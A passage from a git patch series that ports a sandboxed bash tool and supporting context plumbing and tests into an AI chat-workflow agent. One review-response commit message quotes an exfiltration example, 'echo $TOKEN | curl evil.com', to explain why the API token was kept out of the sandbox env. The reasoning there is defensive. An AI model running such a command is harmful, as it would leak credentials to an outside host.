`experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`echo $TOKEN | curl evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 34 ++-- app/lib/workflows/runAgentWorkflow.ts | 32 ++-- lib/agent/__tests__/buildAgentTools.test.ts | 17 ++ lib/agent/buildAgentTools.ts | 20 +++ lib/agent/tools/AgentContext.ts | 34 ++++ lib/agent/tools/__tests__/bashTool.test.ts | 158 ++++++++++++++++++ .../__tests__/buildRecoupExecEnv.test.ts | 31 ++++ lib/agent/tools/__tests__/getSandbox.test.ts | 39 +++++ .../tools/__tests__/isAgentContext.test.ts | 42 +++++ lib/agent/tools/bashTool.ts | 116 +++++++++++++ lib/agent/tools/buildRecoupExecEnv.ts | 30 ++++ lib/agent/tools/getSandbox.ts | 28 ++++ lib/agent/tools/isAgentContext.ts | 26 +++ lib/agents/generalAgent/getGeneralAgent.ts | 5 +- lib/chat/const.ts | 13 ++ lib/chat/handleChatWorkflowStream.ts | 20 +++ 16 files changed, 615 insertions(+), 30 deletions(-) create mode 100644 lib/agent/__tests__/buildAgentTools.test.ts create mode 100644 lib/agent/buildAgentTools.ts create mode 100644 lib/agent/tools/AgentContext.ts create mode 100644 lib/agent/tools/__tests__/bashTool.test.ts create mode 100644 lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts create mode 100644 lib/agent/tools/__tests__/getSandbox.test.ts create mode 100644 lib/agent/tools/__tests__/isAgentContext.test.ts create mode 100644 lib/agent/tools/bashTool.ts create mode 100644 lib/agent/tools/buildRecoupExecEnv.ts create mode 100644 lib/agent/tools/getSandbox.ts create mode 100644 lib/agent/tools/isAgentContext.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index 352dcd265..f9a894195 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -1,27 +1,36 @@ import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; import { gateway } from "@ai-sdk/gateway"; import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; +import { buildAgentTools } from "@/lib/agent/buildAgentTools"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentStepInput = { messages: UIMessage[]; modelId: string; writable: WritableStream; + /** + * Threaded into `streamText`'s `experimental_context` so each tool's + * `execute` callback can read the sandbox state + per-prompt context. + */ + agentContext: AgentContext; }; /** - * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow - * `"use step"` so that: + * One LLM turn (with internal tool-call iteration) in the chat workflow. + * Runs as a Vercel Workflow `"use step"` so: * * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. * - The result is cached as a single durable event — replays after a crash - * do not re-bill the model. + * do not re-bill the model or re-execute tools. * - * Currently emits a plain text response with no tools. Sandbox tools land in - * the follow-up PR (port `@open-harness/agent` tools + wire via - * `experimental_context`). + * `streamText` drives the tool-call → tool-result → next-LLM-call loop + * internally using its default stop condition. Our outer workflow stays + * single-turn for now — multi-turn message threading lands when the rest + * of the tool surface ports in a follow-up PR. * - * @param input - Messages + selected model + the workflow's writable stream. - * @returns finishReason from the model run (for the workflow loop's break condition). + * @param input - Messages + selected model + writable stream + agent context. + * @returns finishReason from the model run. */ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { "use step"; @@ -29,17 +38,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe console.log("[runAgentStep] start", { modelId: input.modelId, messageCount: input.messages.length, + hasSandboxState: Boolean(input.agentContext.sandbox?.state), }); const modelMessages = convertToModelMessages(input.messages); + const tools = buildAgentTools(); const result = streamText({ model: gateway(input.modelId), system: agentCustomInstructions, messages: modelMessages, + tools, + stopWhen: CHAT_AGENT_STOP_WHEN, + experimental_context: input.agentContext, }); - // Acquire the writer once and release in `finally` — re-acquiring per chunk - // (the previous shape) leaked the lock when any write threw. + // Acquire the writer once and release in `finally` so a thrown chunk + // doesn't leak the lock. const writer = input.writable.getWriter(); try { for await (const part of result.toUIMessageStream()) { diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts index db679145a..ce65b0bb3 100644 --- a/app/lib/workflows/runAgentWorkflow.ts +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -1,12 +1,18 @@ import { getWritable } from "workflow"; import type { UIMessage, UIMessageChunk } from "ai"; import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; export type RunAgentWorkflowInput = { messages: UIMessage[]; chatId: string; sessionId: string; modelId: string; + /** + * Threaded into `streamText`'s `experimental_context` so tools (bash et al.) + * can read sandbox state + per-prompt Recoup creds. + */ + agentContext: AgentContext; }; /** @@ -15,18 +21,14 @@ export type RunAgentWorkflowInput = { * client; this function writes UIMessage chunks into the workflow's writable * via `runAgentStep`. * - * Currently runs a SINGLE `runAgentStep` turn. A multi-turn agent loop is - * unsafe today: each iteration would re-send the original prompt without - * the assistant's tool-call response in scope, so a `tool-calls` finish - * reason would loop forever on the same input. The proper multi-turn - * shape (where the step appends its response to `messages` before the - * next iteration) lands with the sandbox-tool port in PR 4. - * - * Until then, if the model returns `tool-calls` we log a warning and exit - * — the client receives the partial tool-call chunks but no follow-up turn. + * Currently runs a SINGLE `runAgentStep` turn. Tool-call iteration (up to + * MAX_TOOL_STEPS) happens INSIDE `streamText` via `stopWhen` — so the + * single workflow turn covers the full "user → assistant → tool → tool + * result → assistant" cycle without our outer loop having to thread + * messages between iterations. * * WDK constraints honored: - * - All I/O (streamText, fetches) lives in `"use step"` functions. + * - All I/O (streamText, sandbox.exec, fetches) lives in `"use step"` functions. * - The workflow body only orchestrates — no fetch / setTimeout / fs / crypto. */ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { @@ -43,14 +45,8 @@ export async function runAgentWorkflow(input: RunAgentWorkflowInput): Promise { + it("returns a tools record keyed by tool name", () => { + const tools = buildAgentTools(); + expect(tools).toHaveProperty("bash"); + expect(typeof tools.bash).toBe("object"); + }); + + it("each tool has an inputSchema, description, and execute", () => { + const tools = buildAgentTools(); + expect(tools.bash.inputSchema).toBeDefined(); + expect(tools.bash.description).toBeDefined(); + expect(typeof tools.bash.execute).toBe("function"); + }); +}); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts new file mode 100644 index 000000000..be6bde085 --- /dev/null +++ b/lib/agent/buildAgentTools.ts @@ -0,0 +1,20 @@ +import { bashTool } from "@/lib/agent/tools/bashTool"; + +/** + * Factory for the full agent tool set passed into `streamText({ tools })`. + * Each tool reads its sandbox handle + recoup creds from `experimental_context` + * at execute time — the factory takes no arguments because the tools are + * stateless modulo that context. + * + * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`, + * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`, + * `fetch`) port in follow-up PRs and slot into this record one-by-one + * without changing the factory signature. + */ +export function buildAgentTools() { + return { + bash: bashTool(), + }; +} + +export type AgentTools = ReturnType; diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts new file mode 100644 index 000000000..63d2a1b7e --- /dev/null +++ b/lib/agent/tools/AgentContext.ts @@ -0,0 +1,34 @@ +import type { VercelState } from "@/lib/sandbox/vercel/state"; + +/** + * Per-tool-call context threaded into the agent via `streamText`'s + * `experimental_context`. Mirrors the open-agents `AgentContext` shape + * (subset — slim PR 4 ports only the `bash` tool, so context only needs + * what `bash` reads). + * + * Why no `recoupAccessToken` field? A short-lived per-prompt credential + * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call + * back to recoup-api as the caller. We deliberately omit it here — the + * legacy api-key path is too long-lived to expose inside a sandbox where + * model-issued bash commands can read env. Proper short-lived token + * minting lands alongside the `skill` tool port. + */ +export type AgentContext = { + /** + * Persistable sandbox state. Tools reconnect via `connectVercel(state)` — + * we never pass a live `Sandbox` instance through context because + * workflow durability requires replay-friendly inputs. + */ + sandbox: { + state: VercelState; + workingDirectory: string; + currentBranch?: string; + }; + /** + * Organization UUID when the sandbox was opened against a recoupable + * org repo (`org--`). Forwarded to sandboxed commands as + * `RECOUP_ORG_ID` so future `recoup-api` skill calls scope to that org. + * Public information — no security risk in exposing. + */ + recoupOrgId?: string; +}; diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts new file mode 100644 index 000000000..da9a999d3 --- /dev/null +++ b/lib/agent/tools/__tests__/bashTool.test.ts @@ -0,0 +1,158 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { bashTool } from "@/lib/agent/tools/bashTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const baseContext = { + sandbox: { state: { sandboxName: "session-x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(overrides: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + exec: vi.fn(), + execDetached: vi.fn(), + ...overrides, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("bashTool.execute", () => { + it("executes a command via sandbox.exec in the sandbox's working directory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = await tool.execute!({ command: "ls" }, { + experimental_context: baseContext, + } as never); + expect(result).toEqual({ + success: true, + exitCode: 0, + stdout: "README.md\npackage.json", + stderr: "", + }); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono", + expect.any(Number), + expect.any(Object), + ); + }); + + it("includes `truncated: true` in the result when sandbox.exec truncated output", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "lots of output", + stderr: "", + truncated: true, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "find ." }, { + experimental_context: baseContext, + } as never)) as { truncated?: boolean }; + expect(result.truncated).toBe(true); + }); + + it("resolves a workspace-relative cwd against sandbox.workingDirectory", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "ls", cwd: "apps/web" }, { + experimental_context: baseContext, + } as never); + expect(sandbox.exec).toHaveBeenCalledWith( + "ls", + "/sandbox/mono/apps/web", + expect.any(Number), + expect.any(Object), + ); + }); + + it("injects RECOUP_ORG_ID into the exec env when present in context", async () => { + const sandbox = makeSandbox({ + exec: vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "curl example.com" }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + const opts = sandbox.exec.mock.calls[0]?.[3] as { env?: Record }; + expect(opts.env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("returns the detached commandId when called with detached:true", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-123" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stdout: string }; + expect(result.success).toBe(true); + expect(result.stdout).toMatch(/cmd-123/); + expect(sandbox.execDetached).toHaveBeenCalledWith("npm run dev", "/sandbox/mono"); + }); + + it("returns success:false with a descriptive stderr when the sandbox lacks execDetached", async () => { + const sandbox = makeSandbox({ execDetached: undefined }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + const result = (await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: baseContext, + } as never)) as { success: boolean; stderr: string }; + expect(result.success).toBe(false); + expect(result.stderr).toMatch(/detached mode is not supported/i); + }); + + it("does NOT inject env vars on detached execs", async () => { + const sandbox = makeSandbox({ + execDetached: vi.fn().mockResolvedValue({ commandId: "cmd-1" }), + }); + vi.mocked(connectVercel).mockResolvedValue(sandbox as never); + + const tool = bashTool(); + await tool.execute!({ command: "npm run dev", detached: true }, { + experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, + } as never); + // execDetached signature is (command, cwd) — no env arg. + expect(sandbox.execDetached.mock.calls[0]).toHaveLength(2); + }); +}); diff --git a/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts new file mode 100644 index 000000000..3422fd662 --- /dev/null +++ b/lib/agent/tools/__tests__/buildRecoupExecEnv.test.ts @@ -0,0 +1,31 @@ +import { describe, it, expect } from "vitest"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; + +const baseSandbox = { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }; + +describe("buildRecoupExecEnv", () => { + it("returns undefined when no context", () => { + expect(buildRecoupExecEnv(undefined)).toBeUndefined(); + expect(buildRecoupExecEnv(null)).toBeUndefined(); + expect(buildRecoupExecEnv("not-a-context")).toBeUndefined(); + }); + + it("returns undefined when context has no recoupOrgId", () => { + expect(buildRecoupExecEnv({ sandbox: baseSandbox })).toBeUndefined(); + }); + + it("injects RECOUP_ORG_ID when present in context", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "org-uuid" }); + expect(env).toEqual({ RECOUP_ORG_ID: "org-uuid" }); + }); + + it("ignores empty-string recoupOrgId", () => { + const env = buildRecoupExecEnv({ sandbox: baseSandbox, recoupOrgId: "" }); + expect(env).toBeUndefined(); + }); + + it("returns undefined when the input is not a valid AgentContext shape", () => { + expect(buildRecoupExecEnv({ recoupOrgId: "org-uuid" })).toBeUndefined(); + expect(buildRecoupExecEnv({ sandbox: null, recoupOrgId: "org-uuid" })).toBeUndefined(); + }); +}); diff --git a/lib/agent/tools/__tests__/getSandbox.test.ts b/lib/agent/tools/__tests__/getSandbox.test.ts new file mode 100644 index 000000000..a14122f81 --- /dev/null +++ b/lib/agent/tools/__tests__/getSandbox.test.ts @@ -0,0 +1,39 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +beforeEach(() => vi.clearAllMocks()); + +describe("getSandbox", () => { + it("reconnects via connectVercel(state) and returns the sandbox", async () => { + const fakeSandbox = { workingDirectory: "/sandbox/mono" }; + vi.mocked(connectVercel).mockResolvedValue(fakeSandbox as never); + const state = { sandboxName: "session-xyz" }; + const result = await getSandbox( + { sandbox: { state, workingDirectory: "/sandbox/mono" } }, + "bash", + ); + expect(result).toBe(fakeSandbox); + expect(connectVercel).toHaveBeenCalledWith(state); + }); + + it("throws a descriptive error when context is missing entirely", async () => { + await expect(getSandbox(undefined, "bash")).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.state is missing", async () => { + await expect( + getSandbox({ sandbox: { workingDirectory: "/x" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); + + it("throws when sandbox.workingDirectory is empty (tightened guard)", async () => { + await expect( + getSandbox({ sandbox: { state: {}, workingDirectory: "" } } as never, "bash"), + ).rejects.toThrow(/Sandbox state missing/); + }); +}); diff --git a/lib/agent/tools/__tests__/isAgentContext.test.ts b/lib/agent/tools/__tests__/isAgentContext.test.ts new file mode 100644 index 000000000..29ad4f29d --- /dev/null +++ b/lib/agent/tools/__tests__/isAgentContext.test.ts @@ -0,0 +1,42 @@ +import { describe, it, expect } from "vitest"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +describe("isAgentContext", () => { + it("returns true for a well-formed context", () => { + expect( + isAgentContext({ + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, + }), + ).toBe(true); + }); + + it("returns false for non-object inputs", () => { + expect(isAgentContext(undefined)).toBe(false); + expect(isAgentContext(null)).toBe(false); + expect(isAgentContext("nope")).toBe(false); + expect(isAgentContext(42)).toBe(false); + }); + + it("returns false when sandbox is missing", () => { + expect(isAgentContext({})).toBe(false); + }); + + it("returns false when sandbox is null", () => { + expect(isAgentContext({ sandbox: null })).toBe(false); + }); + + it("returns false when sandbox is empty (missing state and workingDirectory)", () => { + expect(isAgentContext({ sandbox: {} })).toBe(false); + }); + + it("returns false when sandbox.state is missing or null", () => { + expect(isAgentContext({ sandbox: { workingDirectory: "/x" } })).toBe(false); + expect(isAgentContext({ sandbox: { state: null, workingDirectory: "/x" } })).toBe(false); + }); + + it("returns false when sandbox.workingDirectory is missing, non-string, or empty", () => { + expect(isAgentContext({ sandbox: { state: {} } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: 42 } })).toBe(false); + expect(isAgentContext({ sandbox: { state: {}, workingDirectory: "" } })).toBe(false); + }); +}); diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts new file mode 100644 index 000000000..908113812 --- /dev/null +++ b/lib/agent/tools/bashTool.ts @@ -0,0 +1,116 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; + +const TIMEOUT_MS = 120_000; + +const bashInputSchema = z.object({ + command: z.string().describe("The bash command to execute"), + cwd: z + .string() + .optional() + .describe("Workspace-relative working directory for the command (e.g., apps/web)"), + detached: z + .boolean() + .optional() + .describe( + "Use this whenever you want to run a persistent server in the background (e.g., npm run dev, next dev). The command starts and returns immediately without waiting for it to finish.", + ), +}); + +/** + * Factory for the `bash` sandbox tool. Runs `bash -c ""` inside + * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's + * working directory. + * + * Approval gating is intentionally absent — model-issued commands are + * trusted in this PR. Add a host-side gate at the route/UI layer if that + * changes. + * + * Foreground execs receive `RECOUP_ORG_ID` from agent context (when the + * sandbox is org-scoped) so future `recoup-api` skill calls can scope to + * the right org. Detached execs deliberately skip env injection — those + * processes outlive the prompt. + */ +export const bashTool = () => + tool({ + description: `Execute a bash command in the user's shell (non-interactive). + +WHEN TO USE: +- Running existing project commands (build, test, lint, typecheck) +- Using read-only CLI tools (git status, git diff, ls, etc.) +- Invoking language/package managers (npm, pnpm, yarn, pip, go, etc.) as part of the task + +WHEN NOT TO USE: +- Reading files (use the file read tool instead, once available) +- Editing or creating files (use file edit/write tools, once available) +- Searching code or text (use grep / glob tools, once available) +- Interactive commands (shells, editors, REPLs) + +USAGE: +- Runs bash -c "" in a non-interactive shell (no TTY/PTY) +- Commands run in the sandbox working directory by default — do NOT prepend "cd /path &&" +- Use the cwd parameter ONLY with a workspace-relative subdirectory +- Commands automatically timeout after ~2 minutes +- Combined stdout/stderr output is truncated after ~50,000 characters + +IMPORTANT: +- Never chain commands with ';' or '&&' — use separate tool calls +- Never use interactive commands (vim, nano, top, bash, ssh, etc.) +- Always quote file paths that may contain spaces +- Use detached: true to start dev servers / long-running processes in the background`, + inputSchema: bashInputSchema, + execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { + const sandbox = await getSandbox(experimental_context, "bash"); + const workingDirectory = sandbox.workingDirectory; + const workingDir = cwd + ? path.isAbsolute(cwd) + ? cwd + : path.resolve(workingDirectory, cwd) + : workingDirectory; + + if (detached) { + if (!sandbox.execDetached) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: + "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", + }; + } + try { + const { commandId } = await sandbox.execDetached(command, workingDir); + return { + success: true, + exitCode: null, + stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, + stderr: "", + }; + } catch (error) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: error instanceof Error ? error.message : String(error), + }; + } + } + + const recoupEnv = buildRecoupExecEnv(experimental_context); + const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); + + return { + success: result.success, + exitCode: result.exitCode, + stdout: result.stdout, + stderr: result.stderr, + ...(result.truncated && { truncated: true }), + }; + }, + }); diff --git a/lib/agent/tools/buildRecoupExecEnv.ts b/lib/agent/tools/buildRecoupExecEnv.ts new file mode 100644 index 000000000..6eaf3015f --- /dev/null +++ b/lib/agent/tools/buildRecoupExecEnv.ts @@ -0,0 +1,30 @@ +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Build a per-invocation env override carrying Recoupable sandbox context + * so outbound shell commands (curl, scripts, the `recoup-api` skill) can + * scope requests correctly without any state persisting on the sandbox. + * + * Currently injects only `RECOUP_ORG_ID` — a public identifier. Auth-token + * injection is deliberately NOT included here; a long-lived api key in the + * sandbox env would be readable by any model-issued bash command. Proper + * short-lived token minting will land alongside the `skill` tool port + * (when there's an actual consumer for it). + * + * Returns `undefined` when nothing is available to inject so callers can + * cleanly spread a conditional `...(env ? { env } : {})` into exec opts. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + */ +export function buildRecoupExecEnv( + experimental_context: unknown, +): Record | undefined { + if (!isAgentContext(experimental_context)) return undefined; + + const env: Record = {}; + if (experimental_context.recoupOrgId) { + env.RECOUP_ORG_ID = experimental_context.recoupOrgId; + } + + return Object.keys(env).length > 0 ? env : undefined; +} diff --git a/lib/agent/tools/getSandbox.ts b/lib/agent/tools/getSandbox.ts new file mode 100644 index 000000000..be6c46605 --- /dev/null +++ b/lib/agent/tools/getSandbox.ts @@ -0,0 +1,28 @@ +import type { Sandbox } from "@/lib/sandbox/interface"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Resolve a connected `Sandbox` instance from `experimental_context`. + * Reconnects each call via `connectVercel(state)` rather than caching the + * handle on context — workflow durability requires that side-effecting + * resources (sandbox sessions) be re-acquired inside the step that uses + * them, not passed across event boundaries. + * + * @param experimental_context - The opaque context object passed by AI SDK to tool execute. + * @param toolName - Optional tool name to surface in error messages. + */ +export async function getSandbox( + experimental_context: unknown, + toolName?: string, +): Promise { + if (!isAgentContext(experimental_context)) { + const where = toolName ? ` (tool: ${toolName})` : ""; + throw new Error( + `Sandbox state missing from agent context${where}. ` + + "Ensure the workflow start payload includes `sandbox.state` and that " + + "runAgentStep threads it via experimental_context.", + ); + } + return connectVercel(experimental_context.sandbox.state); +} diff --git a/lib/agent/tools/isAgentContext.ts b/lib/agent/tools/isAgentContext.ts new file mode 100644 index 000000000..0049ac010 --- /dev/null +++ b/lib/agent/tools/isAgentContext.ts @@ -0,0 +1,26 @@ +import type { AgentContext } from "@/lib/agent/tools/AgentContext"; + +/** + * Type-guard that confirms an arbitrary `experimental_context` shape has + * the AgentContext fields tools rely on at runtime. Validates each required + * leaf (sandbox object, state object, non-empty workingDirectory) so callers + * can trust the narrowed type — earlier weaker guards returned true for + * `{ sandbox: null }` or `{ sandbox: {} }`, letting tools later crash on + * "cannot read .x of undefined". + * + * @param value - The opaque context object passed by AI SDK to tool execute. + */ +export function isAgentContext(value: unknown): value is AgentContext { + if (typeof value !== "object" || value === null) return false; + + const candidate = value as { sandbox?: unknown }; + const sandbox = candidate.sandbox; + if (typeof sandbox !== "object" || sandbox === null) return false; + + const sandboxFields = sandbox as { state?: unknown; workingDirectory?: unknown }; + if (typeof sandboxFields.state !== "object" || sandboxFields.state === null) return false; + if (typeof sandboxFields.workingDirectory !== "string") return false; + if (sandboxFields.workingDirectory.length === 0) return false; + + return true; +} diff --git a/lib/agents/generalAgent/getGeneralAgent.ts b/lib/agents/generalAgent/getGeneralAgent.ts index 7c2c9407b..e4bc4fc56 100644 --- a/lib/agents/generalAgent/getGeneralAgent.ts +++ b/lib/agents/generalAgent/getGeneralAgent.ts @@ -1,4 +1,5 @@ -import { stepCountIs, ToolLoopAgent } from "ai"; +import { ToolLoopAgent } from "ai"; +import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { AnthropicProviderOptions } from "@ai-sdk/anthropic"; import { GoogleGenerativeAIProviderOptions } from "@ai-sdk/google"; import { OpenAIResponsesProviderOptions } from "@ai-sdk/openai"; @@ -52,7 +53,7 @@ export default async function getGeneralAgent(body: ChatRequestBody): Promise Date: Thu, 21 May 2026 13:49:12 -0500 Subject: [PATCH 04/10] =?UTF-8?q?feat(chat-workflow):=20port=207=20leaf=20?= =?UTF-8?q?sandbox=20tools=20=E2=80=94=20read/write/edit/grep=E2=80=A6=20(?= =?UTF-8?q?#585)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list 